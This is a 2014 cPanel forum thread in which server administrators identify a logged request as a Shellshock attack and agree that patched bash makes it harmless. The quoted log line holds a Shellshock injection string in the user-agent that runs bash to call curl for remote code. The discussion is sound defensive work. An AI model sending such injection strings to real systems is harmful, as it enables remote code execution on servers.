Please whitelist cPanel in your adblocker so that you’re able to see our version release promotions, thanks!

The Community Forums

Interact with an entire community of cPanel & WHM users!

requests with bash/curl in the browser signature

Discussion in 'Security' started by sehh, Dec 20, 2014.

  1. sehh

    sehh Well-Known Member

    Feb 11, 2006
    Likes Received:
    Trophy Points:
    I see an increase in these types of attacks, requests with a bash execution of curl, which executes a remote piece of code.

    My question is, which application is vulnerable to this attack? something like a log reader, like "awstats"? There aren't many applications that read/parse/display server logs for browser signatures.

    Thank you!

    Code: - - [20/Dec/2014:20:30:43 +0000] "HEAD /cgi-bin/ HTTP/1.1" 301 - "-" "() { :;}; /bin/bash -c 'curl'"
    - - - Updated - - -

    Ah wait, that was just a simple shellshock attack... scratch that :)

    what kind of stupid admin executes bash from cgi-bin?... no wonder this bug did not affect my servers...
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  2. cPanelMichael

    cPanelMichael Technical Support Community Manager Staff Member

    Apr 11, 2011
    Likes Received:
    Trophy Points:
    cPanel Access Level:
    Root Administrator
    Hello :)

    I am happy to see you were able to determine the source of the attack. Thank you for updating us with the outcome.
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  3. quizknows

    quizknows Well-Known Member

    Oct 20, 2009
    Likes Received:
    Trophy Points:
    cPanel Access Level:
    DataCenter Provider
    You'd be surprised. Before bash was updated I saw a lot of boxes get hit, including cPanel stuff. It didn't necessarily have to be a bash script for it to work. They put the shellshock exploit code in every HTTP field you can think of (referrer, user agent, url, post data, etc).

    Anyway as long as your RPM updates run regularly and bash is up to date, nothing to see here. cPanel updates handle yum updates (RPM updates) for the most part anyway, so unless you're one of the fools who disables cPanel udpates entirely, you're fine.

Share This Page

  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.
    Dismiss Notice